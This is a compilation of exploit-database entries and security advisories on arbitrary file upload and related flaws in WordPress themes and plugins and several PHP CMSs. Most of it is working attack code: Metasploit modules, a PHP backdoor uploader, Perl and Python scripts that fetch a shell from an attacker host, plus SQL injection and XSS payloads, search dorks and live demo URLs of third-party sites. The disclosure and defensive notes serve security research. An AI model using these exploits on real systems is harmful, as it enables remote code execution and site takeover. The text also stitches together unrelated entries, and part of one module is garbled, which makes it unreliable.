http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). 
Arbitrary File Upload (WASC-31): http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php
The AoF, DoS and AFU vulnerabilities do not work in the latest version of the theme (where I tested them). This may be due to the protection against the AFU hole in TimThumb, but they should work in earlier versions of this theme.
------------
Timeline:
------------
2013.01.13 - found vulnerabilities.
2013.01.14 - disclosed to the lists.
Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
chillyCMS 1.3.0 Shell Upload / Access Bypass
# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: http://www.youtube.com/watch?v=6B3rND9S75g

# Vulnerability
Failure to Restrict URL Access: chillyCMS relies on 302 redirects to restrict unauthorized access to protected pages.
# Exploit
Step 1: Create a rule in the No-Redirect add-on: ^http://localhost/chillyCMS/
Step 2: Access http://localhost/chillyCMS/admin/

# Vulnerability
Arbitrary File Upload: the chillyCMS/admin/design.site.php page extracts all uploaded ZIP files into the chillyCMS/tmp directory.
# Exploit
Step 1: Create a ZIP file of the files to be uploaded. Example: compress shell.php to get shell.zip
Step 2: Upload shell.zip
Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php

# History
11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
12 March 2012 - Vendor responds; a few mails are exchanged.
15 November 2012 - Vendor discontinues further development.
15 February 2013 - Published the vulnerabilities and exploits to the public.

# How to reproduce
The latest download from the website did not work on a fresh install. An earlier version (1.1.3) was installed and all PHP files except config.php were replaced with the new files.
Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 # 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 # 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 # 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 # 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 # 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 # 1 \ \____/ >> Exploit database separated by exploit 0 # 0 \/___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [+] Site : 1337day.com 0 # 1 [+] Support e-mail : submit[at]1337day.com 1 # 0 0 # 1 ######################################### 1 # 0 I'm KedAns-Dz member from Inj3ct0r Team 1 # 1 ######################################### 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Matterdaddy Market 1.4.2 <= (XSRF/FileUpload) Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum # Type : php - proof of concept - webapp 0day - remote # Tested on : Windows7 (Fr) # Vendor : [http://market.matterdaddy.com] ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! ######## [ Proof / Exploit ] ################|=> ####[ (1) XSRF/HTML Injection ]=> # http://127.0.0.1/market/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1> # Demo : http://demo.opensourcecms.com/fbcmarket/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1> ####[ (2) File Upload .jpg ]=> # go to : http://[target]/[path]/newItem.php?a=1 # add item info (title,name,price..etc) &.. # add u'r file (.jpg) and submited ! 
# Check your email and confirm u'r post ;) :p
# or use this perl script ============>
#!/usr/bin/perl
# Defender notes (review): the newItem form carries a client-supplied
# 'filename' field (here a double extension, "<name>.php;.jpg") separately
# from the file part, and the advisory's other hint ("change file name to ...
# SQLi") suggests the application uses that value as given. Mitigations:
# derive the stored name server-side, allowlist the final extension after
# stripping ';' and extra dots, parameterize any query that stores it, and do
# not execute PHP from the item-image directory. Detection: multipart POSTs to
# controller.php?op=newItem whose filename value contains ".php".
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
|====================================================|
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|====================================================|
INTRO

print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
chomp(my $file=<STDIN>);

my $ua = LWP::UserAgent->new;
# NOTE(review): with HTTP::Request::Common a plain scalar value is transmitted
# as an ordinary form field, so 'filetoupload' carries the path text entered
# above rather than the file's contents. The reply is not inspected for
# status beyond is_success; "Disabled" in the body is taken as success.
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
    Content_Type => 'multipart/form-data',
    Content => [
        'md_title' => '1337day',
        'md_description' => 'Inj3ct0r Exploit Database',
        'md_price' => '0',
        'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
        'city' => 'Hassi Messaoud',
        'namer' => 'KedAns-Dz',
        'category' => '4',
        'filetoupload' => $file,
        'filename' => 'k3dsh3ll.php;.jpg',
        # to make this exploit as sqli change file name to :
        # k3dsh3ll' [+ SQLi +].php.jpg
        # use temperdata better ;)
    ]
);
print "\n";
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) {
        print "[+] Exploit Successfull! File Uploaded!\n";
    } else {
        print "[!] Check your email and confirm u'r post! \n";
    }
} else {
    print "[-] HTTP request Failed!\n";
}
exit;

####[ (3) SQL Injection ] ===>
# is Old 0day found by r4x0r4x (http://1337day.com/exploit/19635)
# p.o.c : /[path]/action.php?cp=1' [+ SQLi +]
# demo :
# http://www.avnv.us/classifieds/action.php?cp=1%27%20and%28select+1+from%28select+count%28*%29,concat%28%28select%20concat%28%27%3E%3E%27,version%28%29,%27%3C%3C%27%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%20--%20-
# google d0rk : intext:"Powered by Matterdaddy"
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================
Havalite CMS Arbitrary File Upload
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Havalite CMS 1.1.7: havalite/upload.php stores a multipart upload from a
# client that holds no session, and the file is served back from
# havalite/tmp/files/.  Flow: check (version scraped from inline JS) ->
# upload -> exec.
#
# NOTE(review): server-side, the fix is an authentication check on upload.php
# plus an allow-list on the stored extension.  On the wire, a POST to
# havalite/upload.php without a session cookie, followed by a GET for
# havalite/tmp/files/<five letters>.php, is the sequence worth alerting on.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Havalite CMS Arbitary File Upload Vulnerability",
      'Description'    => %q{ This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution. },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'CWH',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '94405'],
          ['EDB', '26243']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Platform'       => ['linux', 'php'],
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 17 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])
      ], self.class)
  end

  # host:port string used as the prefix of every status message
  def peer
    "#{rhost}:#{rport}"
  end

  #
  # Checks if target is running HavaLite CMS 1.1.7
  # We only flag 1.1.7 as vulnerable, because we don't have enough information from
  # the vendor or OSVDB about exactly which ones are really vulnerable.
  #
  # The version is read from the first <script> block of havalite/ (the
  # `var myVersion = '...'` assignment).  Anything other than an explicit
  # 1.1.7 match yields Unknown, never Safe.
  #
  def check
    uri = normalize_uri(target_uri.path, 'havalite/')
    res = send_request_raw({'uri' => uri})

    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
    version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''

    if not version.empty? and version =~ /1\.1\.7/
      print_status("#{peer} - Version found: #{version}")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Unknown
  end

  #
  # Uploads our malicious file
  #
  # Sends one multipart POST (field "files[]", random five-letter .php name)
  # to havalite/upload.php.  No cookie or token accompanies the request; that
  # absence is the unauthenticated-upload condition the module depends on.
  # Returns the file name on success; any recognised failure goes through
  # fail_with.
  #
  def upload(base)
    p = get_write_exec_payload(:unlink_self=>true)   # presumably a PHP stub that deletes itself after running -- verify in Msf::Exploit::PhpEXE
    fname = "#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
    # Drop the CRLF Rex::MIME emits before the first part boundary.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(base, 'havalite', 'upload.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Only three outcomes are recognised as failure: no response, a 404 on
    # upload.php, or the application's own {"error":"abort"} body.
    if not res
      fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Exploit::Failure::NotFound, "#{peer} - No upload.php found")
    elsif res.body =~ /"error"\:"abort"/
      fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to write #{fname}")
    end

    return fname
  end

  #
  # Executes our uploaded malicious file
  #
  # GET on havalite/tmp/files/<payload_fname>.  NOTE(review): only an explicit
  # 404 is treated as failure; a nil response (timeout) falls through silently.
  #
  def exec(base, payload_fname)
    res = send_request_raw({
      'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)
    })

    if res and res.code == 404
      fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
    end
  end

  # Entry point: upload, then request the stored file once.
  def exploit
    base = target_uri.path
    print_status("#{peer} - Uploading malicious file...")
    fname = upload(base)

    print_status("#{peer} - Executing #{fname}...")
    exec(base, fname)
  end
end
WordPress multiple vulnerabilities Flexolio theme
Hello list!

There are Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities in Flexolio for WordPress, which contains TimThumb and CU3ER. In April 2011 I wrote about vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote about vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244).

-------------------------
Affected products:
-------------------------

All versions of Flexolio are vulnerable.

-------------------------
Affected vendors:
-------------------------

Quarterpixel
http://quarterpixel.de

----------
Details:
----------

Content Spoofing (Content Injection) (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>http://websecurity.com.ua</link> </slide> </slides> </cu3er>

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>javascript:alert(document.cookie)</link> </slide> </slides> </cu3er>

For cross-domain attacks, the web site hosting the xml-files needs a crossdomain.xml.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

There are also the Abuse of Functionality and DoS vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and the Arbitrary File Upload vulnerability, which was disclosed 3.5 months after my disclosure of the previous holes. They are possible in old versions of the theme, because in the latest versions of the theme TimThumb forbids access to remote sites.
Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD in the php-files of the theme (by default) or in error_log, in index.php and other php-files.

http://site/wp-content/themes/webfolio/

------------
Timeline:
------------

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins and later about themes. Later informed developers of the plugins and themes.
2014.04.26 - disclosed at my site about Flexolio for WordPress (http://websecurity.com.ua/7141/).

Best wishes & regards, MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability [+] Date: 2014-08-12 [+] Author: Hekt0r [+] Tested on: Windows7 & Kali Linux [+] Vendor Homepage: http://wordpress.org/ [+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/ [+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/ ### POC: http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html [+] File Uploaded: http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt ### Demo: http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html ### Credits: [+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Qzz, Ali Ahmady, Saeed.Jok3r M4hdi, Vahid Hαcĸer, BlackErroR, Phantom.S3c And All members of Iran Security Group [+] iransec.net |
MAARCH 1.4 Arbitrary File Upload
/******************************************************
# Exploit Title: Maarch 1.4 Arbitrary file upload
# Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
# Date: 29/10/2014
# Exploit Author: Adrien Thierry
# Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
# Vendor Homepage: http://maarch.org
# Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip
# Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
# Tested on: Linux / Windows
******************************************************/

The file "file_to_index.php" is accessible without any authentication to upload a file.
This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4

Exploit code :

<?php
/*
 * PoC for the Maarch "file_to_index.php" upload endpoint (Letterbox <= 2.4,
 * GEC/GED <= 1.4): one multipart POST carrying no session cookie, then a
 * printed link to where the server is expected to have written the file.
 *
 * NOTE(review): server-side, the fix is an authentication check on
 * file_to_index.php and an allow-list on the stored extension.  For
 * monitoring, a POST to indexing_searching/file_to_index.php?md5=... from a
 * client without a session, followed by a GET under tmp/tmp_file_*, is the
 * pattern to alert on.
 */

/* EXPLOIT URL */
$target_url= "http://website.target/apps/maarch_enterprise/";

/* EMPTY FOR OLD VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";

/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";

/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";

/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";

/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);

/**
 * Builds a single-part multipart/form-data body from $file and POSTs it to
 * $url through PHP's http stream wrapper, then prints where the upload is
 * expected to be reachable.
 *
 * @param string $url   full URL of file_to_index.php, including ?md5=...
 * @param string $res   base URL, used only to build the printed link
 * @param string $file  local path whose contents become the form part
 * @param string $name  value used both in the query string and in the printed link
 * @throws Exception when the stream cannot be opened or read
 */
function do_post_request($url, $res, $file, $name)
{
    $data = "";
    $boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
    $data .= "--$boundary\n";
    $fileContents = file_get_contents($file);
    $md5 = md5_file($file);                          // computed but never used below
    $ext = pathinfo($file, PATHINFO_EXTENSION);      // reused for the printed link only
    // The part is always announced as "file.php" with a text/plain type,
    // regardless of $file.
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
    $data .= "Content-Type: text/plain\n";
    $data .= "Content-Transfer-Encoding: binary\n\n";
    $data .= $fileContents."\n";
    $data .= "--$boundary--\n";

    // No Cookie or auth header is set: the request goes out unauthenticated.
    $params = array('http' => array(
        'method' => 'POST',
        'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
        'content' => $data
    ));
    $ctx = stream_context_create($params);
    $fp = fopen($url, 'rb', false, $ctx);            // the POST is performed here
    if (!$fp) {
        throw new Exception("Erreur !");
    }
    $response = @stream_get_contents($fp);           // '@' hides read warnings; only a hard false is treated as failure
    if ($response === false) {
        throw new Exception("Erreur !");
    } else {
        echo "file should be here : ";
        /* LETTERBOX */
        if(count($response) > 1)
            echo $response;
        /* MAARCH ENTERPRISE | GEC */
        else
            echo "<a href='" . $res . "tmp/tmp_file_" . $name . "." . $ext . "'>BACKDOOR<a>";
    }
}
?>
WordPress Download Manager Unauthenticated File Upload
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# WordPress download-manager < 2.7.5: wp-admin/post.php?task=wpdm_upload_files
# accepts a multipart upload from a client with no WordPress session and
# answers with the stored file name, which is then requested from
# wp-content/uploads/download-manager-files/.
#
# NOTE(review): the fix is the plugin update to 2.7.5 or later named in the
# description.  A POST to wp-admin/post.php with task=wpdm_upload_files from
# a client that holds no session cookie is the request to alert on.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
      'Description'     => %q{ The WordPress download-manager plugin contains multiple unauthenticated file upload vulnerabilities which were fixed in version 2.7.5. },
      'Author'          =>
        [
          'Mickael Nadeau', # initial discovery
          'Christian Mehlmauer' # metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          # The module exploits another vuln not mentioned in this post, but was also fixed
          ['URL', 'http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html'],
          ['WPVDB', '7706']
        ],
      'Privileged'      => false,
      'Platform'        => ['php'],
      'Arch'            => ARCH_PHP,
      'Targets'         => [['download-manager < 2.7.5', {}]],
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Dec 3 2014'))
  end

  # Compares the plugin's readme version against 2.7.5, the first fixed release.
  def check
    check_plugin_version_from_readme('download-manager', '2.7.5')
  end

  # Uploads the payload as a random ten-letter .php file, then requests it once.
  # The POST carries no cookie or nonce; the only routing parameter is
  # task=wpdm_upload_files in the query string.
  def exploit
    filename = "#{rand_text_alpha(10)}.php"

    data = Rex::MIME::Message.new
    # NOTE(review): the filename in this header reads "#(unknown)" as rendered
    # on this page, while the success check below expects the response body to
    # end with the random `filename`; that looks like a rendering artifact of
    # the page rather than the module's text -- confirm against the upstream
    # source.
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#(unknown)\"")

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(wordpress_url_backend, 'post.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s,
      'vars_get' => { 'task' => 'wpdm_upload_files' }
    )

    # Success means a 200 whose body ends with the random file name; the whole
    # body is then taken as the name the server stored the file under.
    if res && res.code == 200 && res.body && res.body.length > 0 && res.body =~ /#{Regexp.escape(filename)}$/
      uploaded_filename = res.body
      register_files_for_cleanup(uploaded_filename)   # FileDropper deletes it at session cleanup
      print_status("#{peer} - File #{uploaded_filename} successfully uploaded")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    file_path = normalize_uri(target_uri, 'wp-content', 'uploads', 'download-manager-files', uploaded_filename)
    print_status("#{peer} - Calling uploaded file #{file_path}")
    # Fire-and-forget GET with a 5 second timeout; the response is not inspected.
    send_request_cgi(
      {
        'uri' => file_path,
        'method' => 'GET'
      }, 5)
  end
end
WordPress Pixarbay Images 2.3 XSS / Bypass / Upload / Traversal
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------

Title: WP Pixarbay Images Multiple Vulnerabilities
Product: Pixarbay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

Vendor's Description of the Software:
----------------------------------------------------------------------

Pixabay Images is a WordPress plugin that lets you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.

Business recommendation:
----------------------------------------------------------------------

Update to version 2.4

Vulnerability description:
----------------------------------------------------------------------

1) Authentication bypass

The plugin does not correctly check if the user is logged in. Certain code can be called without authentication.

2) Arbitrary file upload

The plugin code does not validate the host in the provided download URL, which allows uploading malicious files, including PHP code.

3) Path Traversal

Certain values are not sanitized before they are used in a file operation. This allows storing files outside of the "download" folder.

4) Cross Site Scripting (XSS)

The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks.

Proof of concept:
----------------------------------------------------------------------

The following PoC Python script can be used to download PHP files from an attacker-controlled host.
#!/usr/bin/env python
# PoC for the Pixabay Images 2.3 issues described above: a single POST to
# <blog>/wp-admin/, sent with no cookie or nonce, that asks the plugin to fetch
# 'image_url' and store it under a caller-chosen path ('q' carries "../"
# segments).
#
# NOTE(review): the vendor fix is plugin version 2.4 (see "Business
# recommendation").  For monitoring, a POST to /wp-admin/ carrying
# pixabay_upload=1 whose image_url does not point at the Pixabay service, or
# whose q value contains "../", is the request shape to alert on.
import argparse
import httplib, urllib
from urlparse import urlparse


def exploit(target_url, shellcode_url):
    """Send the download request to target_url.

    target_url    -- blog base URL; only its netloc and path are used
    shellcode_url -- value passed through as the plugin's image_url
    Exits the process when the response is neither 200 nor the expected
    metadata-error body; returns nothing otherwise.
    """
    target = urlparse(target_url)
    params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
    headers = headers = {"Content-type": "application/x-www-form-urlencoded"}  # double assignment is as published

    print "[+] Sending download request...."
    conn = httplib.HTTPConnection(target.netloc)  # plain HTTP only
    conn.request("POST", target.path + "/wp-admin/", params, headers)
    response = conn.getresponse()
    response_data = response.read()
    # Both conditions must hold to report failure: a non-200 whose body is the
    # metadata-error string is still treated as success (presumably that error
    # is expected once the file has been written -- confirm).
    if response.status != 200 and response_data != "Error: File attachment metadata error":
        print "[-] Something went wrong"
        print response_data
        exit()
    conn.close()

# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php")

print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"

arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)

Vulnerable / tested versions:
----------------------------------------------------------------------

Pixabay Images 2.3

Disclosure timeline:
----------------------------------------------------------------------

14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory

Advisory URL:
----------------------------------------------------------------------

https://www.mogwaisecurity.de/#lab

----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de